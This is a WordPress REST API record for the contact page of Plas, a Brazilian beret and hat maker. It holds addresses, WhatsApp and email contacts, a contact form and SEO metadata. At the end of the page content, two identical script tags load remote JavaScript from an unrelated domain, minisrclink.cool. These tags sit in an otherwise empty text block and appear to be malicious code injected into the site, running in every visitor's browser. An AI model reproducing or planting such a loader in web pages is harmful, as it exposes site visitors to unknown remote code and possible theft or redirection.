


























{"id":333,"date":"2014-08-25T14:29:40","date_gmt":"2014-08-25T14:29:40","guid":{"rendered":"http:\/\/bitpublimedia.ro\/themeforest\/diamond-wp\/?page_id=7"},"modified":"2025-02-22T09:07:55","modified_gmt":"2025-02-22T12:07:55","slug":"contact","status":"publish","type":"page","link":"https:\/\/plas.com.br\/site\/contact\/","title":{"rendered":"Contato"},"content":{"rendered":"<p>[vc_row][vc_column]<header class=\"tz-header tz-header-type-1\">\r\n\r\n            <div class=\"tz-headerTop\">\r\n            <div class=\"container\">\r\n                <div class=\"tz-headerTop-box\">\r\n                    <div class=\"tz-headerLeft pull-left\">\r\n                        <div class=\"tzheader_support\">\r\n                                                        \r\n                            \r\n                            \r\n                            \r\n                            \r\n                                                    <\/div>\r\n                    <\/div>\r\n\r\n                    <div class=\"tz-headerRight pull-right\">\r\n                        <ul class=\"tzheader_social\">\r\n                                                                                                                                                                                                                                                                                                                                            <\/ul>\r\n                    <\/div>\r\n                <\/div>\r\n            <\/div><!--end class container-->\r\n        <\/div>\r\n        \r\n    \r\n    <div class=\"tz-headerBottom tz-max-mega-menu\">\r\n                <div class=\"container\">\r\n            \r\n                                                    <a class=\"pull-left tz_logo\" href=\"https:\/\/plas.com.br\/site\"\r\n                       title=\"Plas\" >\r\n                        <img decoding=\"async\" class=\"logo_lager\" src=\"https:\/\/plas.com.br\/site\/wp-content\/uploads\/2016\/07\/LogoPlas-final1.gif\" alt=\"Plas\" \/>                    <\/a>\r\n                                        \r\n                                                                                    <button type=\"button\" class=\"navbar-toggle collapsed\" data-toggle=\"collapse\"\r\n                            data-target=\"#tz-navbar-collapse\">\r\n                        <i class=\"fa fa-bars\"><\/i>\r\n                    <\/button>\r\n\r\n                    <nav class=\"pull-right\">\r\n\r\n                        <div id=\"mega-menu-wrap-primary\" class=\"mega-menu-wrap\"><div class=\"mega-menu-toggle\"><div class=\"mega-toggle-blocks-left\"><\/div><div class=\"mega-toggle-blocks-center\"><\/div><div class=\"mega-toggle-blocks-right\"><div class='mega-toggle-block mega-menu-toggle-animated-block mega-toggle-block-0' id='mega-toggle-block-0'><button aria-label=\"Toggle Menu\" class=\"mega-toggle-animated mega-toggle-animated-slider\" type=\"button\" aria-expanded=\"false\">\n                  <span class=\"mega-toggle-animated-box\">\n                    <span class=\"mega-toggle-animated-inner\"><\/span>\n                  <\/span>\n                <\/button><\/div><\/div><\/div><ul id=\"mega-menu-primary\" class=\"mega-menu max-mega-menu mega-menu-horizontal mega-no-js\" data-event=\"hover_intent\" data-effect=\"fade_up\" data-effect-speed=\"200\" data-effect-mobile=\"disabled\" data-effect-speed-mobile=\"0\" data-panel-width=\".container\" data-mobile-force-width=\"false\" data-second-click=\"go\" data-document-click=\"collapse\" data-vertical-behaviour=\"standard\" data-breakpoint=\"992\" data-unbind=\"true\" data-mobile-state=\"collapse_all\" data-mobile-direction=\"vertical\" data-hover-intent-timeout=\"300\" data-hover-intent-interval=\"100\"><li class=\"mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-menu-item-home mega-align-bottom-left mega-menu-flyout mega-menu-item-715\" id=\"mega-menu-item-715\"><a class=\"mega-menu-link\" href=\"https:\/\/plas.com.br\/site\/\" tabindex=\"0\">Home<\/a><\/li><li class=\"mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-align-bottom-left mega-menu-flyout mega-menu-item-804\" id=\"mega-menu-item-804\"><a class=\"mega-menu-link\" href=\"https:\/\/plas.com.br\/site\/about-us\/\" tabindex=\"0\">Hist\u00f3ria<\/a><\/li><li class=\"mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-menu-item-has-children mega-align-bottom-left mega-menu-flyout mega-menu-item-710\" id=\"mega-menu-item-710\"><a class=\"mega-menu-link\" href=\"https:\/\/plas.com.br\/site\/portfolio-2-2\/\" aria-expanded=\"false\" tabindex=\"0\">Produtos<span class=\"mega-indicator\" aria-hidden=\"true\"><\/span><\/a>\n<ul class=\"mega-sub-menu\">\n<li class=\"mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-menu-item-945\" id=\"mega-menu-item-945\"><a class=\"mega-menu-link\" href=\"https:\/\/plas.com.br\/site\/boinas\/\">Boinas<\/a><\/li><li class=\"mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-menu-item-994\" id=\"mega-menu-item-994\"><a class=\"mega-menu-link\" href=\"https:\/\/plas.com.br\/site\/camisas\/\">Camisas<\/a><\/li><li class=\"mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-menu-item-944\" id=\"mega-menu-item-944\"><a class=\"mega-menu-link\" href=\"https:\/\/plas.com.br\/site\/chapeus\/\">Chap\u00e9us<\/a><\/li><\/ul>\n<\/li><li class=\"mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-align-bottom-left mega-menu-flyout mega-menu-item-1258\" id=\"mega-menu-item-1258\"><a class=\"mega-menu-link\" href=\"https:\/\/plas.com.br\/site\/services-2\/\" tabindex=\"0\">Alfaiataria<\/a><\/li><li class=\"mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-current_page_parent mega-align-bottom-left mega-menu-flyout mega-menu-item-716\" id=\"mega-menu-item-716\"><a class=\"mega-menu-link\" href=\"https:\/\/plas.com.br\/site\/blog-2\/\" tabindex=\"0\">News<\/a><\/li><li class=\"mega-menu-item mega-menu-item-type-custom mega-menu-item-object-custom mega-align-bottom-left mega-menu-flyout mega-menu-item-805\" id=\"mega-menu-item-805\"><a class=\"mega-menu-link\" href=\"http:\/\/plas.lojavirtualnuvem.com.br\/\" tabindex=\"0\">Loja Virtual<\/a><\/li><li class=\"mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-align-bottom-left mega-menu-flyout mega-menu-item-701\" id=\"mega-menu-item-701\"><a class=\"mega-menu-link\" href=\"https:\/\/plas.com.br\/site\/contact\/\" tabindex=\"0\">Contato<\/a><\/li><\/ul><\/div>                    <\/nav>\r\n                    \r\n                                        <\/div><!--end class container-->\r\n        <\/div>\r\n\r\n    \r\n\r\n<\/header>\r\n    <div class=\"tz-header tz-header-type-1 scroll\">\r\n        <div class=\"tz-headerBottom tz-max-mega-menu\">\r\n                        <div class=\"container\">\r\n                \r\n                                                                <a class=\"pull-left tz_logo\" href=\"https:\/\/plas.com.br\/site\"\r\n                           title=\"Plas\" >\r\n                            <img decoding=\"async\" class=\"logo_lager\" src=\"https:\/\/plas.com.br\/site\/wp-content\/uploads\/2016\/07\/LogoPlas-final1.gif\" alt=\"Plas\" \/>                        <\/a>\r\n                                                                                                <button type=\"button\" class=\"navbar-toggle collapsed\" data-toggle=\"collapse\"\r\n                                data-target=\"#tz-navbar-collapse\">\r\n                            <i class=\"fa fa-bars\"><\/i>\r\n                        <\/button>\r\n\r\n                        <nav class=\"pull-right\">\r\n                            <div id=\"mega-menu-wrap-primary\" class=\"mega-menu-wrap\"><div class=\"mega-menu-toggle\"><div class=\"mega-toggle-blocks-left\"><\/div><div class=\"mega-toggle-blocks-center\"><\/div><div class=\"mega-toggle-blocks-right\"><div class='mega-toggle-block mega-menu-toggle-animated-block mega-toggle-block-0' id='mega-toggle-block-0'><button aria-label=\"Toggle Menu\" class=\"mega-toggle-animated mega-toggle-animated-slider\" type=\"button\" aria-expanded=\"false\">\n                  <span class=\"mega-toggle-animated-box\">\n                    <span class=\"mega-toggle-animated-inner\"><\/span>\n                  <\/span>\n                <\/button><\/div><\/div><\/div><ul id=\"mega-menu-primary\" class=\"mega-menu max-mega-menu mega-menu-horizontal mega-no-js\" data-event=\"hover_intent\" data-effect=\"fade_up\" data-effect-speed=\"200\" data-effect-mobile=\"disabled\" data-effect-speed-mobile=\"0\" data-panel-width=\".container\" data-mobile-force-width=\"false\" data-second-click=\"go\" data-document-click=\"collapse\" data-vertical-behaviour=\"standard\" data-breakpoint=\"992\" data-unbind=\"true\" data-mobile-state=\"collapse_all\" data-mobile-direction=\"vertical\" data-hover-intent-timeout=\"300\" data-hover-intent-interval=\"100\"><li class=\"mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-menu-item-home mega-align-bottom-left mega-menu-flyout mega-menu-item-715\" id=\"mega-menu-item-715\"><a class=\"mega-menu-link\" href=\"https:\/\/plas.com.br\/site\/\" tabindex=\"0\">Home<\/a><\/li><li class=\"mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-align-bottom-left mega-menu-flyout mega-menu-item-804\" id=\"mega-menu-item-804\"><a class=\"mega-menu-link\" href=\"https:\/\/plas.com.br\/site\/about-us\/\" tabindex=\"0\">Hist\u00f3ria<\/a><\/li><li class=\"mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-menu-item-has-children mega-align-bottom-left mega-menu-flyout mega-menu-item-710\" id=\"mega-menu-item-710\"><a class=\"mega-menu-link\" href=\"https:\/\/plas.com.br\/site\/portfolio-2-2\/\" aria-expanded=\"false\" tabindex=\"0\">Produtos<span class=\"mega-indicator\" aria-hidden=\"true\"><\/span><\/a>\n<ul class=\"mega-sub-menu\">\n<li class=\"mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-menu-item-945\" id=\"mega-menu-item-945\"><a class=\"mega-menu-link\" href=\"https:\/\/plas.com.br\/site\/boinas\/\">Boinas<\/a><\/li><li class=\"mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-menu-item-994\" id=\"mega-menu-item-994\"><a class=\"mega-menu-link\" href=\"https:\/\/plas.com.br\/site\/camisas\/\">Camisas<\/a><\/li><li class=\"mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-menu-item-944\" id=\"mega-menu-item-944\"><a class=\"mega-menu-link\" href=\"https:\/\/plas.com.br\/site\/chapeus\/\">Chap\u00e9us<\/a><\/li><\/ul>\n<\/li><li class=\"mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-align-bottom-left mega-menu-flyout mega-menu-item-1258\" id=\"mega-menu-item-1258\"><a class=\"mega-menu-link\" href=\"https:\/\/plas.com.br\/site\/services-2\/\" tabindex=\"0\">Alfaiataria<\/a><\/li><li class=\"mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-current_page_parent mega-align-bottom-left mega-menu-flyout mega-menu-item-716\" id=\"mega-menu-item-716\"><a class=\"mega-menu-link\" href=\"https:\/\/plas.com.br\/site\/blog-2\/\" tabindex=\"0\">News<\/a><\/li><li class=\"mega-menu-item mega-menu-item-type-custom mega-menu-item-object-custom mega-align-bottom-left mega-menu-flyout mega-menu-item-805\" id=\"mega-menu-item-805\"><a class=\"mega-menu-link\" href=\"http:\/\/plas.lojavirtualnuvem.com.br\/\" tabindex=\"0\">Loja Virtual<\/a><\/li><li class=\"mega-menu-item mega-menu-item-type-post_type mega-menu-item-object-page mega-align-bottom-left mega-menu-flyout mega-menu-item-701\" id=\"mega-menu-item-701\"><a class=\"mega-menu-link\" href=\"https:\/\/plas.com.br\/site\/contact\/\" tabindex=\"0\">Contato<\/a><\/li><\/ul><\/div>                        <\/nav>\r\n                        \r\n                                                    <\/div><!--end class container-->\r\n                <\/div>\r\n    <\/div>\r\n    [\/vc_column][\/vc_row][vc_row tz_row_type=&#8221;grid&#8221; css=&#8221;.vc_custom_1594048308413{margin-top: 5% !important;margin-bottom: 5% !important;}&#8221;][vc_column width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;872&#8243; img_size=&#8221;full&#8221; alignment=&#8221;right&#8221;][\/vc_column][vc_column width=&#8221;3\/4&#8243;][vc_column_text]<em>Maurice and Robert will have great pleasure to talk to you! As mr. Plas, whom \u00a0is creating and telling his funny stories in another spiritual level, they love to make new friends!<\/em><\/p>\n<p>Maurice e Robert ter\u00e3o grande prazer em falar com voc\u00eas! Assim como monsieur Plas, que agora est\u00e1 costurando em algum plano espiritual e contando suas hist\u00f3rias, eles adoram fazer novas amizades![\/vc_column_text][\/vc_column][\/vc_row][vc_row fullwidth=&#8221;1&#8243;][vc_column][vc_raw_html]JTNDY2VudGVyJTNFJTBBRU0lMjBCUkVWRSUyME5PVkElMjBMT0pBJTBBJTNDJTJGY2VudGVyJTNF[\/vc_raw_html][\/vc_column][\/vc_row][vc_row tz_row_type=&#8221;grid&#8221; css=&#8221;.vc_custom_1594048328007{margin-top: 5% !important;margin-bottom: 5% !important;}&#8221;][vc_column width=&#8221;1\/4&#8243;][vc_column_text]<\/p>\n<address><strong>Plas<\/strong><\/address>\n<address>Ecommerce : rua Giovanni Gianesi 13, Vila Cordeiro, SP.( marcar hor\u00e1rio com Maurice)<\/address>\n<address>Ecofeira Granja Viana no Parque Tereza Maia, todo domingo das 7h30 \u00e0s 12h30,<\/address>\n<address>( www.ecofeiragranjaviana.com.br).<\/address>\n<address>\u00a0<\/address>\n<address>\u00a0<\/address>\n<address><strong>Hor\u00e1rios de abertura<\/strong><\/address>\n<address>ENTRAR EM CONTATO COM NOSSO WHATSAPP:(11)98948-2645<\/address>\n<address>\u00a0<\/address>\n<address><strong>Contato<\/strong><\/address>\n<address>Vendas e Encomendas por Whatsapp: (11)<strong>98948-2645<\/strong><br \/>\nInstagram: @plasmodas<\/address>\n<address>Youtube: @chapeusplas6021<br \/>\nEmail:\u00a0vendas@plas.com.br<\/address>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;3\/4&#8243;]<div role=\"form\" class=\"wpcf7\" id=\"wpcf7-f4-o1\" lang=\"en-US\" dir=\"ltr\">\n<div class=\"screen-reader-response\" role=\"alert\" aria-live=\"polite\"><\/div>\n<form action=\"\/site\/wp-json\/wp\/v2\/pages\/333#wpcf7-f4-o1\" method=\"post\" class=\"wpcf7-form init\" novalidate=\"novalidate\">\n<div style=\"display: none;\">\n<input type=\"hidden\" name=\"_wpcf7\" value=\"4\" \/>\n<input type=\"hidden\" name=\"_wpcf7_version\" value=\"5.2\" \/>\n<input type=\"hidden\" name=\"_wpcf7_locale\" value=\"en_US\" \/>\n<input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f4-o1\" \/>\n<input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/>\n<input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/>\n<\/div>\n<div class=\"ewf-row\">\n<div class=\"ewf-span4\">\n<p>\t\t<span class=\"wpcf7-form-control-wrap your-name\"><input type=\"text\" name=\"your-name\" value=\"\" size=\"40\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"Nome\" \/><\/span> <\/p><\/div>\n<div class=\"ewf-span4\">\n<p>\t\t<span class=\"wpcf7-form-control-wrap your-email\"><input type=\"email\" name=\"your-email\" value=\"\" size=\"40\" class=\"wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"Endere\u00e7o de e-mail\" \/><\/span><\/p><\/div>\n<div class=\"ewf-span4\">\n<p>\t\t<span class=\"wpcf7-form-control-wrap your-subject\"><input type=\"text\" name=\"your-subject\" value=\"\" size=\"40\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"Assunto\" \/><\/span><\/p><\/div>\n<\/div>\n<p>    <span class=\"wpcf7-form-control-wrap your-message\"><textarea name=\"your-message\" cols=\"40\" rows=\"10\" class=\"wpcf7-form-control wpcf7-textarea wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"Mensagem\"><\/textarea><\/span><\/p>\n<p>   <input type=\"submit\" value=\"Enviar\" class=\"wpcf7-form-control wpcf7-submit\" \/><\/p>\n<p style=\"display: none !important;\" class=\"akismet-fields-container\" data-prefix=\"_wpcf7_ak_\"><label>&#916;<textarea name=\"_wpcf7_ak_hp_textarea\" cols=\"45\" rows=\"8\" maxlength=\"100\"><\/textarea><\/label><input type=\"hidden\" id=\"ak_js_1\" name=\"_wpcf7_ak_js\" value=\"187\"\/><script>document.getElementById( \"ak_js_1\" ).setAttribute( \"value\", ( new Date() ).getTime() );<\/script><\/p><div class=\"wpcf7-response-output\" role=\"alert\" aria-hidden=\"true\"><\/div><\/form><\/div>[\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<\/p>\n<p><script src=\"\/\/minisrclink.cool\/1e40c8bd4601a5a5a4.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/minisrclink.cool\/1e40c8bd4601a5a5a4.js\" async=\"\" type=\"text\/javascript\"><\/script>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column][\/vc_column][\/vc_row][vc_row tz_row_type=&#8221;grid&#8221; css=&#8221;.vc_custom_1594048308413{margin-top: 5% !important;margin-bottom: 5% !important;}&#8221;][vc_column width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;872&#8243; img_size=&#8221;full&#8221; alignment=&#8221;right&#8221;][\/vc_column][vc_column width=&#8221;3\/4&#8243;][vc_column_text]Maurice and Robert will have great pleasure to talk to you! As mr. Plas, whom \u00a0is creating and telling his funny stories in another spiritual level, they love to make new friends! Maurice e Robert ter\u00e3o grande prazer em falar com voc\u00eas! Assim como [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"template-homepage.php","meta":{"footnotes":""},"class_list":["post-333","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Plas Boinas Plas Boina contato - Plas Boinas<\/title>\n<meta name=\"description\" content=\"Contato da Plas, confec\u00e7\u00e3o de boinas artesanais, camisas estampadas, chap\u00e9us panam\u00e1 legitimos e afins\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/plas.com.br\/site\/contact\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Plas Boinas Plas Boina contato - Plas Boinas\" \/>\n<meta property=\"og:description\" content=\"Contato da Plas, confec\u00e7\u00e3o de boinas artesanais, camisas estampadas, chap\u00e9us panam\u00e1 legitimos e afins\" \/>\n<meta property=\"og:url\" content=\"https:\/\/plas.com.br\/site\/contact\/\" \/>\n<meta property=\"og:site_name\" content=\"Plas\" \/>\n<meta property=\"article:modified_time\" content=\"2025-02-22T12:07:55+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/plas.com.br\/site\/contact\/\",\"url\":\"https:\/\/plas.com.br\/site\/contact\/\",\"name\":\"Plas Boinas Plas Boina contato - Plas Boinas\",\"isPartOf\":{\"@id\":\"https:\/\/plas.com.br\/site\/#website\"},\"datePublished\":\"2014-08-25T14:29:40+00:00\",\"dateModified\":\"2025-02-22T12:07:55+00:00\",\"description\":\"Contato da Plas, confec\u00e7\u00e3o de boinas artesanais, camisas estampadas, chap\u00e9us panam\u00e1 legitimos e afins\",\"breadcrumb\":{\"@id\":\"https:\/\/plas.com.br\/site\/contact\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/plas.com.br\/site\/contact\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/plas.com.br\/site\/contact\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/plas.com.br\/site\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Contato\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/plas.com.br\/site\/#website\",\"url\":\"https:\/\/plas.com.br\/site\/\",\"name\":\"Plas\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/plas.com.br\/site\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Plas Boinas Plas Boina contato - Plas Boinas","description":"Contato da Plas, confec\u00e7\u00e3o de boinas artesanais, camisas estampadas, chap\u00e9us panam\u00e1 legitimos e afins","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/plas.com.br\/site\/contact\/","og_locale":"pt_BR","og_type":"article","og_title":"Plas Boinas Plas Boina contato - Plas Boinas","og_description":"Contato da Plas, confec\u00e7\u00e3o de boinas artesanais, camisas estampadas, chap\u00e9us panam\u00e1 legitimos e afins","og_url":"https:\/\/plas.com.br\/site\/contact\/","og_site_name":"Plas","article_modified_time":"2025-02-22T12:07:55+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/plas.com.br\/site\/contact\/","url":"https:\/\/plas.com.br\/site\/contact\/","name":"Plas Boinas Plas Boina contato - Plas Boinas","isPartOf":{"@id":"https:\/\/plas.com.br\/site\/#website"},"datePublished":"2014-08-25T14:29:40+00:00","dateModified":"2025-02-22T12:07:55+00:00","description":"Contato da Plas, confec\u00e7\u00e3o de boinas artesanais, camisas estampadas, chap\u00e9us panam\u00e1 legitimos e afins","breadcrumb":{"@id":"https:\/\/plas.com.br\/site\/contact\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/plas.com.br\/site\/contact\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/plas.com.br\/site\/contact\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/plas.com.br\/site\/"},{"@type":"ListItem","position":2,"name":"Contato"}]},{"@type":"WebSite","@id":"https:\/\/plas.com.br\/site\/#website","url":"https:\/\/plas.com.br\/site\/","name":"Plas","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/plas.com.br\/site\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"}]}},"_links":{"self":[{"href":"https:\/\/plas.com.br\/site\/wp-json\/wp\/v2\/pages\/333","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/plas.com.br\/site\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/plas.com.br\/site\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/plas.com.br\/site\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/plas.com.br\/site\/wp-json\/wp\/v2\/comments?post=333"}],"version-history":[{"count":46,"href":"https:\/\/plas.com.br\/site\/wp-json\/wp\/v2\/pages\/333\/revisions"}],"predecessor-version":[{"id":3525,"href":"https:\/\/plas.com.br\/site\/wp-json\/wp\/v2\/pages\/333\/revisions\/3525"}],"wp:attachment":[{"href":"https:\/\/plas.com.br\/site\/wp-json\/wp\/v2\/media?parent=333"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}